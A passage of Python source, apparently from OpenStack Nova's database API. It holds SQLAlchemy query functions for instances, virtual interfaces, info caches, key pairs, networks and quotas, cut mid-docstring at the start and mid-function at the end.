"""Delete virtual interface records that are associated
with the instance given by instance_id.
:param instance_uuid: = uuid of instance
"""
_virtual_interface_query(context).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
@require_context
def virtual_interface_get_all(context):
"""Get all vifs."""
vif_refs = _virtual_interface_query(context).all()
return vif_refs
###################
def _metadata_refs(metadata_dict, meta_class):
metadata_refs = []
if metadata_dict:
for k, v in metadata_dict.iteritems():
metadata_ref = meta_class()
metadata_ref['key'] = k
metadata_ref['value'] = v
metadata_refs.append(metadata_ref)
return metadata_refs
def _validate_unique_server_name(context, session, name):
if not CONF.osapi_compute_unique_server_name_scope:
return
lowername = name.lower()
base_query = model_query(context, models.Instance, session=session,
read_deleted=False).\
filter(func.lower(models.Instance.hostname) == lowername)
if CONF.osapi_compute_unique_server_name_scope == 'project':
instance_with_same_name = base_query.\
filter_by(project_id=context.project_id).\
count()
elif CONF.osapi_compute_unique_server_name_scope == 'global':
instance_with_same_name = base_query.count()
else:
msg = _('Unknown osapi_compute_unique_server_name_scope value: %s'
' Flag must be empty, "global" or'
' "project"') % CONF.osapi_compute_unique_server_name_scope
LOG.warn(msg)
return
if instance_with_same_name > 0:
raise exception.InstanceExists(name=lowername)
def _handle_objects_related_type_conversions(values):
"""Make sure that certain things in values (which may have come from
an objects.instance.Instance object) are in suitable form for the
database.
"""
# NOTE(danms): Make sure IP addresses are passed as strings to
# the database engine
for key in ('access_ip_v4', 'access_ip_v6'):
if key in values and values[key] is not None:
values[key] = str(values[key])
datetime_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at', 'scheduled_at')
convert_objects_related_datetimes(values, *datetime_keys)
@require_context
def instance_create(context, values):
"""Create a new Instance record in the database.
context - request context object
values - dict containing column values.
"""
values = values.copy()
values['metadata'] = _metadata_refs(
values.get('metadata'), models.InstanceMetadata)
values['system_metadata'] = _metadata_refs(
values.get('system_metadata'), models.InstanceSystemMetadata)
_handle_objects_related_type_conversions(values)
instance_ref = models.Instance()
if not values.get('uuid'):
values['uuid'] = str(uuid.uuid4())
instance_ref['info_cache'] = models.InstanceInfoCache()
info_cache = values.pop('info_cache', None)
if info_cache is not None:
instance_ref['info_cache'].update(info_cache)
security_groups = values.pop('security_groups', [])
instance_ref.update(values)
def _get_sec_group_models(session, security_groups):
models = []
default_group = security_group_ensure_default(context)
if 'default' in security_groups:
models.append(default_group)
# Generate a new list, so we don't modify the original
security_groups = [x for x in security_groups if x != 'default']
if security_groups:
models.extend(_security_group_get_by_names(context,
session, context.project_id, security_groups))
return models
session = get_session()
with session.begin():
if 'hostname' in values:
_validate_unique_server_name(context, session, values['hostname'])
instance_ref.security_groups = _get_sec_group_models(session,
security_groups)
session.add(instance_ref)
# create the instance uuid to ec2_id mapping entry for instance
ec2_instance_create(context, instance_ref['uuid'])
return instance_ref
def _instance_data_get_for_user(context, project_id, user_id, session=None):
result = model_query(context,
func.count(models.Instance.id),
func.sum(models.Instance.vcpus),
func.sum(models.Instance.memory_mb),
base_model=models.Instance,
session=session).\
filter_by(project_id=project_id)
if user_id:
result = result.filter_by(user_id=user_id).first()
else:
result = result.first()
# NOTE(vish): convert None to 0
return (result[0] or 0, result[1] or 0, result[2] or 0)
@require_context
def instance_destroy(context, instance_uuid, constraint=None):
session = get_session()
with session.begin():
if uuidutils.is_uuid_like(instance_uuid):
instance_ref = _instance_get_by_uuid(context, instance_uuid,
session=session)
else:
raise exception.InvalidUUID(instance_uuid)
query = model_query(context, models.Instance, session=session).\
filter_by(uuid=instance_uuid)
if constraint is not None:
query = constraint.apply(models.Instance, query)
count = query.soft_delete()
if count == 0:
raise exception.ConstraintNotMet()
model_query(context, models.SecurityGroupInstanceAssociation,
session=session).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceInfoCache, session=session).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceMetadata, session=session).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
model_query(context, models.InstanceFault, session=session).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
return instance_ref
@require_context
def instance_get_by_uuid(context, uuid, columns_to_join=None, use_slave=False):
return _instance_get_by_uuid(context, uuid,
columns_to_join=columns_to_join, use_slave=use_slave)
def _instance_get_by_uuid(context, uuid, session=None,
columns_to_join=None, use_slave=False):
result = _build_instance_get(context, session=session,
columns_to_join=columns_to_join,
use_slave=use_slave).\
filter_by(uuid=uuid).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=uuid)
return result
@require_context
def instance_get(context, instance_id, columns_to_join=None):
try:
result = _build_instance_get(context, columns_to_join=columns_to_join
).filter_by(id=instance_id).first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_id)
return result
except DataError:
# NOTE(sdague): catch all in case the db engine chokes on the
# id because it's too long of an int to store.
msg = _("Invalid instance id %s in request") % instance_id
LOG.warn(msg)
raise exception.InvalidID(id=instance_id)
def _build_instance_get(context, session=None,
columns_to_join=None, use_slave=False):
query = model_query(context, models.Instance, session=session,
project_only=True, use_slave=use_slave).\
options(joinedload_all('security_groups.rules')).\
options(joinedload('info_cache'))
if columns_to_join is None:
columns_to_join = ['metadata', 'system_metadata']
for column in columns_to_join:
if column in ['info_cache', 'security_groups']:
# Already always joined above
continue
query = query.options(joinedload(column))
#NOTE(alaski) Stop lazy loading of columns not needed.
for col in ['metadata', 'system_metadata']:
if col not in columns_to_join:
query = query.options(noload(col))
return query
def _instances_fill_metadata(context, instances,
manual_joins=None, use_slave=False):
"""Selectively fill instances with manually-joined metadata. Note that
instance will be converted to a dict.
:param context: security context
:param instances: list of instances to fill
:param manual_joins: list of tables to manually join (can be any
combination of 'metadata' and 'system_metadata' or
None to take the default of both)
"""
uuids = [inst['uuid'] for inst in instances]
if manual_joins is None:
manual_joins = ['metadata', 'system_metadata']
meta = collections.defaultdict(list)
if 'metadata' in manual_joins:
for row in _instance_metadata_get_multi(context, uuids,
use_slave=use_slave):
meta[row['instance_uuid']].append(row)
sys_meta = collections.defaultdict(list)
if 'system_metadata' in manual_joins:
for row in _instance_system_metadata_get_multi(context, uuids,
use_slave=use_slave):
sys_meta[row['instance_uuid']].append(row)
pcidevs = collections.defaultdict(list)
if 'pci_devices' in manual_joins:
for row in _instance_pcidevs_get_multi(context, uuids):
pcidevs[row['instance_uuid']].append(row)
filled_instances = []
for inst in instances:
inst = dict(inst.iteritems())
inst['system_metadata'] = sys_meta[inst['uuid']]
inst['metadata'] = meta[inst['uuid']]
if 'pci_devices' in manual_joins:
inst['pci_devices'] = pcidevs[inst['uuid']]
filled_instances.append(inst)
return filled_instances
def _manual_join_columns(columns_to_join):
manual_joins = []
for column in ('metadata', 'system_metadata', 'pci_devices'):
if column in columns_to_join:
columns_to_join.remove(column)
manual_joins.append(column)
return manual_joins, columns_to_join
@require_context
def instance_get_all(context, columns_to_join=None):
if columns_to_join is None:
columns_to_join = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join = _manual_join_columns(columns_to_join)
query = model_query(context, models.Instance)
for column in columns_to_join:
query = query.options(joinedload(column))
if not context.is_admin:
# If we're not admin context, add appropriate filter..
if context.project_id:
query = query.filter_by(project_id=context.project_id)
else:
query = query.filter_by(user_id=context.user_id)
instances = query.all()
return _instances_fill_metadata(context, instances, manual_joins)
@require_context
def instance_get_all_by_filters(context, filters, sort_key, sort_dir,
limit=None, marker=None, columns_to_join=None,
use_slave=False):
"""Return instances that match all filters. Deleted instances
will be returned by default, unless there's a filter that says
otherwise.
Depending on the name of a filter, matching for that filter is
performed using either exact matching or as regular expression
matching. Exact matching is applied for the following filters:
['project_id', 'user_id', 'image_ref',
'vm_state', 'instance_type_id', 'uuid',
'metadata', 'host', 'system_metadata']
A third type of filter (also using exact matching), filters
based on instance metadata tags when supplied under a special
key named 'filter'.
filters = {
'filter': [
{'name': 'tag-key', 'value': '<metakey>'},
{'name': 'tag-value', 'value': '<metaval>'},
{'name': 'tag:<metakey>', 'value': '<metaval>'}
]
}
Special keys are used to tweek the query further:
'changes-since' - only return instances updated after
'deleted' - only return (or exclude) deleted instances
'soft_deleted' - modify behavior of 'deleted' to either
include or exclude instances whose
vm_state is SOFT_DELETED.
"""
sort_fn = {'desc': desc, 'asc': asc}
if CONF.database.slave_connection == '':
use_slave = False
session = get_session(use_slave=use_slave)
if columns_to_join is None:
columns_to_join = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join = _manual_join_columns(columns_to_join)
query_prefix = session.query(models.Instance)
for column in columns_to_join:
query_prefix = query_prefix.options(joinedload(column))
query_prefix = query_prefix.order_by(sort_fn[sort_dir](
getattr(models.Instance, sort_key)))
# Make a copy of the filters dictionary to use going forward, as we'll
# be modifying it and we shouldn't affect the caller's use of it.
filters = filters.copy()
if 'changes-since' in filters:
changes_since = timeutils.normalize_time(filters['changes-since'])
query_prefix = query_prefix.\
filter(models.Instance.updated_at >= changes_since)
if 'deleted' in filters:
# Instances can be soft or hard deleted and the query needs to
# include or exclude both
if filters.pop('deleted'):
if filters.pop('soft_deleted', True):
deleted = or_(
models.Instance.deleted == models.Instance.id,
models.Instance.vm_state == vm_states.SOFT_DELETED
)
query_prefix = query_prefix.\
filter(deleted)
else:
query_prefix = query_prefix.\
filter(models.Instance.deleted == models.Instance.id)
else:
query_prefix = query_prefix.\
filter_by(deleted=0)
if not filters.pop('soft_deleted', False):
# It would be better to have vm_state not be nullable
# but until then we test it explicitly as a workaround.
not_soft_deleted = or_(
models.Instance.vm_state != vm_states.SOFT_DELETED,
models.Instance.vm_state == None
)
query_prefix = query_prefix.filter(not_soft_deleted)
if 'cleaned' in filters:
if filters.pop('cleaned'):
query_prefix = query_prefix.filter(models.Instance.cleaned == 1)
else:
query_prefix = query_prefix.filter(models.Instance.cleaned == 0)
if not context.is_admin:
# If we're not admin context, add appropriate filter..
if context.project_id:
filters['project_id'] = context.project_id
else:
filters['user_id'] = context.user_id
# Filters for exact matches that we can do along with the SQL query...
# For other filters that don't match this, we will do regexp matching
exact_match_filter_names = ['project_id', 'user_id', 'image_ref',
'vm_state', 'instance_type_id', 'uuid',
'metadata', 'host', 'task_state',
'system_metadata']
# Filter the query
query_prefix = exact_filter(query_prefix, models.Instance,
filters, exact_match_filter_names)
query_prefix = regex_filter(query_prefix, models.Instance, filters)
query_prefix = tag_filter(context, query_prefix, models.Instance,
models.InstanceMetadata,
models.InstanceMetadata.instance_uuid,
filters)
# paginate query
if marker is not None:
try:
marker = _instance_get_by_uuid(context, marker, session=session)
except exception.InstanceNotFound:
raise exception.MarkerNotFound(marker)
query_prefix = sqlalchemyutils.paginate_query(query_prefix,
models.Instance, limit,
[sort_key, 'created_at', 'id'],
marker=marker,
sort_dir=sort_dir)
return _instances_fill_metadata(context, query_prefix.all(), manual_joins)
def tag_filter(context, query, model, model_metadata,
model_uuid, filters):
"""Applies tag filtering to a query.
Returns the updated query. This method alters filters to remove
keys that are tags. This filters on resources by tags - this
method assumes that the caller will take care of access control
:param query: query to apply filters to
:param model: model object the query applies to
:param filters: dictionary of filters
"""
if filters.get('filter') is None:
return query
or_query = None
def _to_list(val):
if isinstance(val, dict):
val = val.values()
if not isinstance(val, (tuple, list, set)):
val = (val,)
return val
for filter_block in filters['filter']:
if not isinstance(filter_block, dict):
continue
filter_name = filter_block.get('name')
if filter_name is None:
continue
tag_name = filter_name[4:]
tag_val = _to_list(filter_block.get('value'))
if filter_name.startswith('tag-'):
if tag_name not in ['key', 'value']:
msg = _("Invalid field name: %s") % tag_name
raise exception.InvalidParameterValue(err=msg)
subq = getattr(model_metadata, tag_name).in_(tag_val)
or_query = subq if or_query is None else or_(or_query, subq)
elif filter_name.startswith('tag:'):
subq = model_query(context, model_uuid,
session=query.session, base_model=model_metadata).\
filter_by(key=tag_name).\
filter(model_metadata.value.in_(tag_val))
query = query.filter(model.uuid.in_(subq))
if or_query is not None:
subq = model_query(context, model_uuid,
session=query.session, base_model=model_metadata).\
filter(or_query)
query = query.filter(model.uuid.in_(subq))
return query
def regex_filter(query, model, filters):
"""Applies regular expression filtering to a query.
Returns the updated query.
:param query: query to apply filters to
:param model: model object the query applies to
:param filters: dictionary of filters with regex values
"""
regexp_op_map = {
'postgresql': '~',
'mysql': 'REGEXP',
'sqlite': 'REGEXP'
}
db_string = CONF.database.connection.split(':')[0].split('+')[0]
db_regexp_op = regexp_op_map.get(db_string, 'LIKE')
for filter_name in filters.iterkeys():
try:
column_attr = getattr(model, filter_name)
except AttributeError:
continue
if 'property' == type(column_attr).__name__:
continue
if db_regexp_op == 'LIKE':
query = query.filter(column_attr.op(db_regexp_op)(
'%' + str(filters[filter_name]) + '%'))
else:
query = query.filter(column_attr.op(db_regexp_op)(
str(filters[filter_name])))
return query
@require_context
def instance_get_active_by_window_joined(context, begin, end=None,
project_id=None, host=None):
"""Return instances and joins that were active during window."""
session = get_session()
query = session.query(models.Instance)
query = query.options(joinedload('info_cache')).\
options(joinedload('security_groups')).\
filter(or_(models.Instance.terminated_at == None,
models.Instance.terminated_at > begin))
if end:
query = query.filter(models.Instance.launched_at < end)
if project_id:
query = query.filter_by(project_id=project_id)
if host:
query = query.filter_by(host=host)
return _instances_fill_metadata(context, query.all())
def _instance_get_all_query(context, project_only=False,
joins=None, use_slave=False):
if joins is None:
joins = ['info_cache', 'security_groups']
query = model_query(context,
models.Instance,
project_only=project_only,
use_slave=use_slave)
for join in joins:
query = query.options(joinedload(join))
return query
@require_admin_context
def instance_get_all_by_host(context, host,
columns_to_join=None,
use_slave=False):
return _instances_fill_metadata(context,
_instance_get_all_query(context,
use_slave=use_slave).filter_by(host=host).all(),
manual_joins=columns_to_join,
use_slave=use_slave)
def _instance_get_all_uuids_by_host(context, host, session=None):
"""Return a list of the instance uuids on a given host.
Returns a list of UUIDs, not Instance model objects. This internal version
allows you to specify a session object as a kwarg.
"""
uuids = []
for tuple in model_query(context, models.Instance.uuid, read_deleted="no",
base_model=models.Instance, session=session).\
filter_by(host=host).\
all():
uuids.append(tuple[0])
return uuids
@require_admin_context
def instance_get_all_by_host_and_node(context, host, node):
return _instances_fill_metadata(context,
_instance_get_all_query(context, joins=[]).filter_by(host=host).
filter_by(node=node).all(), manual_joins=[])
@require_admin_context
def instance_get_all_by_host_and_not_type(context, host, type_id=None):
return _instances_fill_metadata(context,
_instance_get_all_query(context).filter_by(host=host).
filter(models.Instance.instance_type_id != type_id).all())
# NOTE(jkoelker) This is only being left here for compat with floating
# ips. Currently the network_api doesn't return floaters
# in network_info. Once it starts return the model. This
# function and its call in compute/manager.py on 1829 can
# go away
@require_context
def instance_get_floating_address(context, instance_id):
instance = instance_get(context, instance_id)
fixed_ips = fixed_ip_get_by_instance(context, instance['uuid'])
if not fixed_ips:
return None
# NOTE(tr3buchet): this only gets the first fixed_ip
# won't find floating ips associated with other fixed_ips
floating_ips = floating_ip_get_by_fixed_address(context,
fixed_ips[0]['address'])
if not floating_ips:
return None
# NOTE(vish): this just returns the first floating ip
return floating_ips[0]['address']
@require_context
def instance_floating_address_get_all(context, instance_uuid):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
fixed_ip_ids = model_query(context, models.FixedIp.id,
base_model=models.FixedIp).\
filter_by(instance_uuid=instance_uuid).\
all()
if not fixed_ip_ids:
raise exception.FixedIpNotFoundForInstance(instance_uuid=instance_uuid)
fixed_ip_ids = [fixed_ip_id.id for fixed_ip_id in fixed_ip_ids]
floating_ips = model_query(context, models.FloatingIp.address,
base_model=models.FloatingIp).\
filter(models.FloatingIp.fixed_ip_id.in_(fixed_ip_ids)).\
all()
return [floating_ip.address for floating_ip in floating_ips]
# NOTE(hanlind): This method can be removed as conductor RPC API moves to v2.0.
@require_admin_context
def instance_get_all_hung_in_rebooting(context, reboot_window):
reboot_window = (timeutils.utcnow() -
datetime.timedelta(seconds=reboot_window))
# NOTE(danms): this is only used in the _poll_rebooting_instances()
# call in compute/manager, so we can avoid the metadata lookups
# explicitly
return _instances_fill_metadata(context,
model_query(context, models.Instance).
filter(models.Instance.updated_at <= reboot_window).
filter_by(task_state=task_states.REBOOTING).all(),
manual_joins=[])
@require_context
def instance_update(context, instance_uuid, values):
instance_ref = _instance_update(context, instance_uuid, values)[1]
return instance_ref
@require_context
def instance_update_and_get_original(context, instance_uuid, values,
columns_to_join=None):
"""Set the given properties on an instance and update it. Return
a shallow copy of the original instance reference, as well as the
updated one.
:param context: = request context object
:param instance_uuid: = instance uuid
:param values: = dict containing column values
If "expected_task_state" exists in values, the update can only happen
when the task state before update matches expected_task_state. Otherwise
a UnexpectedTaskStateError is thrown.
:returns: a tuple of the form (old_instance_ref, new_instance_ref)
Raises NotFound if instance does not exist.
"""
return _instance_update(context, instance_uuid, values,
copy_old_instance=True,
columns_to_join=columns_to_join)
# NOTE(danms): This updates the instance's metadata list in-place and in
# the database to avoid stale data and refresh issues. It assumes the
# delete=True behavior of instance_metadata_update(...)
def _instance_metadata_update_in_place(context, instance, metadata_type, model,
metadata, session):
metadata = dict(metadata)
to_delete = []
for keyvalue in instance[metadata_type]:
key = keyvalue['key']
if key in metadata:
keyvalue['value'] = metadata.pop(key)
elif key not in metadata:
to_delete.append(keyvalue)
for condemned in to_delete:
condemned.soft_delete(session=session)
for key, value in metadata.iteritems():
newitem = model()
newitem.update({'key': key, 'value': value,
'instance_uuid': instance['uuid']})
session.add(newitem)
instance[metadata_type].append(newitem)
def _instance_update(context, instance_uuid, values, copy_old_instance=False,
columns_to_join=None):
session = get_session()
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(instance_uuid)
with session.begin():
instance_ref = _instance_get_by_uuid(context, instance_uuid,
session=session,
columns_to_join=columns_to_join)
if "expected_task_state" in values:
# it is not a db column so always pop out
expected = values.pop("expected_task_state")
if not isinstance(expected, (tuple, list, set)):
expected = (expected,)
actual_state = instance_ref["task_state"]
if actual_state not in expected:
if actual_state == task_states.DELETING:
raise exception.UnexpectedDeletingTaskStateError(
actual=actual_state, expected=expected)
else:
raise exception.UnexpectedTaskStateError(
actual=actual_state, expected=expected)
if "expected_vm_state" in values:
expected = values.pop("expected_vm_state")
if not isinstance(expected, (tuple, list, set)):
expected = (expected,)
actual_state = instance_ref["vm_state"]
if actual_state not in expected:
raise exception.UnexpectedVMStateError(actual=actual_state,
expected=expected)
instance_hostname = instance_ref['hostname'] or ''
if ("hostname" in values and
values["hostname"].lower() != instance_hostname.lower()):
_validate_unique_server_name(context,
session,
values['hostname'])
if copy_old_instance:
old_instance_ref = copy.copy(instance_ref)
else:
old_instance_ref = None
metadata = values.get('metadata')
if metadata is not None:
_instance_metadata_update_in_place(context, instance_ref,
'metadata',
models.InstanceMetadata,
values.pop('metadata'),
session)
system_metadata = values.get('system_metadata')
if system_metadata is not None:
_instance_metadata_update_in_place(context, instance_ref,
'system_metadata',
models.InstanceSystemMetadata,
values.pop('system_metadata'),
session)
_handle_objects_related_type_conversions(values)
instance_ref.update(values)
session.add(instance_ref)
return (old_instance_ref, instance_ref)
def instance_add_security_group(context, instance_uuid, security_group_id):
"""Associate the given security group with the given instance."""
sec_group_ref = models.SecurityGroupInstanceAssociation()
sec_group_ref.update({'instance_uuid': instance_uuid,
'security_group_id': security_group_id})
sec_group_ref.save()
@require_context
def instance_remove_security_group(context, instance_uuid, security_group_id):
"""Disassociate the given security group from the given instance."""
model_query(context, models.SecurityGroupInstanceAssociation).\
filter_by(instance_uuid=instance_uuid).\
filter_by(security_group_id=security_group_id).\
soft_delete()
###################
@require_context
def instance_info_cache_get(context, instance_uuid):
"""Gets an instance info cache from the table.
:param instance_uuid: = uuid of the info cache's instance
:param session: = optional session object
"""
return model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
first()
@require_context
def instance_info_cache_update(context, instance_uuid, values):
"""Update an instance info cache record in the table.
:param instance_uuid: = uuid of info cache's instance
:param values: = dict containing column values to update
:param session: = optional session object
"""
session = get_session()
with session.begin():
info_cache = model_query(context, models.InstanceInfoCache,
session=session).\
filter_by(instance_uuid=instance_uuid).\
first()
if info_cache and info_cache['deleted']:
raise exception.InstanceInfoCacheNotFound(
instance_uuid=instance_uuid)
elif not info_cache:
# NOTE(tr3buchet): just in case someone blows away an instance's
# cache entry, re-create it.
info_cache = models.InstanceInfoCache()
values['instance_uuid'] = instance_uuid
try:
info_cache.update(values)
except db_exc.DBDuplicateEntry:
# NOTE(sirp): Possible race if two greenthreads attempt to
# recreate the instance cache entry at the same time. First one
# wins.
pass
return info_cache
@require_context
def instance_info_cache_delete(context, instance_uuid):
"""Deletes an existing instance_info_cache record
:param instance_uuid: = uuid of the instance tied to the cache record
:param session: = optional session object
"""
model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
###################
@require_context
def key_pair_create(context, values):
try:
key_pair_ref = models.KeyPair()
key_pair_ref.update(values)
key_pair_ref.save()
return key_pair_ref
except db_exc.DBDuplicateEntry:
raise exception.KeyPairExists(key_name=values['name'])
@require_context
def key_pair_destroy(context, user_id, name):
nova.context.authorize_user_context(context, user_id)
result = model_query(context, models.KeyPair).\
filter_by(user_id=user_id).\
filter_by(name=name).\
soft_delete()
if not result:
raise exception.KeypairNotFound(user_id=user_id, name=name)
@require_context
def key_pair_get(context, user_id, name):
nova.context.authorize_user_context(context, user_id)
result = model_query(context, models.KeyPair).\
filter_by(user_id=user_id).\
filter_by(name=name).\
first()
if not result:
raise exception.KeypairNotFound(user_id=user_id, name=name)
return result
@require_context
def key_pair_get_all_by_user(context, user_id):
nova.context.authorize_user_context(context, user_id)
return model_query(context, models.KeyPair, read_deleted="no").\
filter_by(user_id=user_id).\
all()
def key_pair_count_by_user(context, user_id):
nova.context.authorize_user_context(context, user_id)
return model_query(context, models.KeyPair, read_deleted="no").\
filter_by(user_id=user_id).\
count()
###################
@require_admin_context
def network_associate(context, project_id, network_id=None, force=False):
"""Associate a project with a network.
called by project_get_networks under certain conditions
and network manager add_network_to_project()
only associate if the project doesn't already have a network
or if force is True
force solves race condition where a fresh project has multiple instance
builds simultaneously picked up by multiple network hosts which attempt
to associate the project with multiple networks
force should only be used as a direct consequence of user request
all automated requests should not use force
"""
session = get_session()
with session.begin():
def network_query(project_filter, id=None):
filter_kwargs = {'project_id': project_filter}
if id is not None:
filter_kwargs['id'] = id
return model_query(context, models.Network, session=session,
read_deleted="no").\
filter_by(**filter_kwargs).\
with_lockmode('update').\
first()
if not force:
# find out if project has a network
network_ref = network_query(project_id)
if force or not network_ref:
# in force mode or project doesn't have a network so associate
# with a new network
# get new network
network_ref = network_query(None, network_id)
if not network_ref:
raise exception.NoMoreNetworks()
# associate with network
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
network_ref['project_id'] = project_id
session.add(network_ref)
return network_ref
def _network_ips_query(context, network_id):
return model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id)
@require_admin_context
def network_count_reserved_ips(context, network_id):
return _network_ips_query(context, network_id).\
filter_by(reserved=True).\
count()
@require_admin_context
def network_create_safe(context, values):
network_ref = models.Network()
network_ref['uuid'] = str(uuid.uuid4())
network_ref.update(values)
try:
network_ref.save()
return network_ref
except db_exc.DBDuplicateEntry:
raise exception.DuplicateVlan(vlan=values['vlan'])
@require_admin_context
def network_delete_safe(context, network_id):
session = get_session()
with session.begin():
result = model_query(context, models.FixedIp, session=session,
read_deleted="no").\
filter_by(network_id=network_id).\
filter_by(allocated=True).\
count()
if result != 0:
raise exception.NetworkInUse(network_id=network_id)
network_ref = _network_get(context, network_id=network_id,
session=session)
model_query(context, models.FixedIp, session=session,
read_deleted="no").\
filter_by(network_id=network_id).\
soft_delete()
session.delete(network_ref)
@require_admin_context
def network_disassociate(context, network_id, disassociate_host,
disassociate_project):
net_update = {}
if disassociate_project:
net_update['project_id'] = None
if disassociate_host:
net_update['host'] = None
network_update(context, network_id, net_update)
def _network_get(context, network_id, session=None, project_only='allow_none'):
result = model_query(context, models.Network, session=session,
project_only=project_only).\
filter_by(id=network_id).\
first()
if not result:
raise exception.NetworkNotFound(network_id=network_id)
return result
@require_context
def network_get(context, network_id, project_only='allow_none'):
return _network_get(context, network_id, project_only=project_only)
@require_context
def network_get_all(context, project_only):
result = model_query(context, models.Network, read_deleted="no",
project_only=project_only).all()
if not result:
raise exception.NoNetworksFound()
return result
@require_context
def network_get_all_by_uuids(context, network_uuids, project_only):
result = model_query(context, models.Network, read_deleted="no",
project_only=project_only).\
filter(models.Network.uuid.in_(network_uuids)).\
all()
if not result:
raise exception.NoNetworksFound()
#check if the result contains all the networks
#we are looking for
for network_uuid in network_uuids:
found = False
for network in result:
if network['uuid'] == network_uuid:
found = True
break
if not found:
if project_only:
raise exception.NetworkNotFoundForProject(
network_uuid=network_uuid, project_id=context.project_id)
raise exception.NetworkNotFound(network_id=network_uuid)
return result
# NOTE(vish): pylint complains because of the long method name, but
# it fits with the names of the rest of the methods
# pylint: disable=C0103
@require_admin_context
def network_get_associated_fixed_ips(context, network_id, host=None):
# FIXME(sirp): since this returns fixed_ips, this would be better named
# fixed_ip_get_all_by_network.
# NOTE(vish): The ugly joins here are to solve a performance issue and
# should be removed once we can add and remove leases
# without regenerating the whole list
vif_and = and_(models.VirtualInterface.id ==
models.FixedIp.virtual_interface_id,
models.VirtualInterface.deleted == 0)
inst_and = and_(models.Instance.uuid == models.FixedIp.instance_uuid,
models.Instance.deleted == 0)
session = get_session()
query = session.query(models.FixedIp.address,
models.FixedIp.instance_uuid,
models.FixedIp.network_id,
models.FixedIp.virtual_interface_id,
models.VirtualInterface.address,
models.Instance.hostname,
models.Instance.updated_at,
models.Instance.created_at,
models.FixedIp.allocated,
models.FixedIp.leased).\
filter(models.FixedIp.deleted == 0).\
filter(models.FixedIp.network_id == network_id).\
filter(models.FixedIp.allocated == True).\
join((models.VirtualInterface, vif_and)).\
join((models.Instance, inst_and)).\
filter(models.FixedIp.instance_uuid != None).\
filter(models.FixedIp.virtual_interface_id != None)
if host:
query = query.filter(models.Instance.host == host)
result = query.all()
data = []
for datum in result:
cleaned = {}
cleaned['address'] = datum[0]
cleaned['instance_uuid'] = datum[1]
cleaned['network_id'] = datum[2]
cleaned['vif_id'] = datum[3]
cleaned['vif_address'] = datum[4]
cleaned['instance_hostname'] = datum[5]
cleaned['instance_updated'] = datum[6]
cleaned['instance_created'] = datum[7]
cleaned['allocated'] = datum[8]
cleaned['leased'] = datum[9]
data.append(cleaned)
return data
def network_in_use_on_host(context, network_id, host):
fixed_ips = network_get_associated_fixed_ips(context, network_id, host)
return len(fixed_ips) > 0
def _network_get_query(context, session=None):
return model_query(context, models.Network, session=session,
read_deleted="no")
@require_admin_context
def network_get_by_uuid(context, uuid):
result = _network_get_query(context).filter_by(uuid=uuid).first()
if not result:
raise exception.NetworkNotFoundForUUID(uuid=uuid)
return result
@require_admin_context
def network_get_by_cidr(context, cidr):
result = _network_get_query(context).\
filter(or_(models.Network.cidr == cidr,
models.Network.cidr_v6 == cidr)).\
first()
if not result:
raise exception.NetworkNotFoundForCidr(cidr=cidr)
return result
@require_admin_context
def network_get_all_by_host(context, host):
session = get_session()
fixed_host_filter = or_(models.FixedIp.host == host,
models.Instance.host == host)
fixed_ip_query = model_query(context, models.FixedIp.network_id,
base_model=models.FixedIp,
session=session).\
outerjoin((models.VirtualInterface,
models.VirtualInterface.id ==
models.FixedIp.virtual_interface_id)).\
outerjoin((models.Instance,
models.Instance.uuid ==
models.VirtualInterface.instance_uuid)).\
filter(fixed_host_filter)
# NOTE(vish): return networks that have host set
# or that have a fixed ip with host set
# or that have an instance with host set
host_filter = or_(models.Network.host == host,
models.Network.id.in_(fixed_ip_query.subquery()))
return _network_get_query(context, session=session).\
filter(host_filter).\
all()
@require_admin_context
def network_set_host(context, network_id, host_id):
session = get_session()
with session.begin():
network_ref = _network_get_query(context, session=session).\
filter_by(id=network_id).\
with_lockmode('update').\
first()
if not network_ref:
raise exception.NetworkNotFound(network_id=network_id)
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
if not network_ref['host']:
network_ref['host'] = host_id
session.add(network_ref)
return network_ref['host']
@require_context
def network_update(context, network_id, values):
session = get_session()
with session.begin():
network_ref = _network_get(context, network_id, session=session)
network_ref.update(values)
try:
network_ref.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.DuplicateVlan(vlan=values['vlan'])
return network_ref
###################
@require_context
def quota_get(context, project_id, resource, user_id=None):
model = models.ProjectUserQuota if user_id else models.Quota
query = model_query(context, model).\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if user_id:
query = query.filter_by(user_id=user_id)
result = query.first()
if not result:
if user_id:
raise exception.ProjectUserQuotaNotFound(project_id=project_id,
user_id=user_id)
else:
raise exception.ProjectQuotaNotFound(project_id=project_id)
return result
@require_context
def quota_get_all_by_project_and_user(context, project_id, user_id):
nova.context.authorize_project_context(context, project_id)
user_quotas = model_query(context, models.ProjectUserQuota.resource,
models.ProjectUserQuota.hard_limit,
base_model=models.ProjectUserQuota).\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
all()
result = {'project_id': project_id, 'user_id': user_id}
for quota in user_quotas:
result[quota.resource] = quota.hard_limit
return result
@require_context
def quota_get_all_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
rows = model_query(context, models.Quota, read_deleted="no").\
filter_by(project_id=project_id).\
all()
result = {'project_id': project_id}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_context
def quota_get_all(context, project_id):
nova.context.authorize_project_context(context, project_id)
result = model_query(context, models.ProjectUserQuota).\
filter_by(project_id=project_id).\
all()
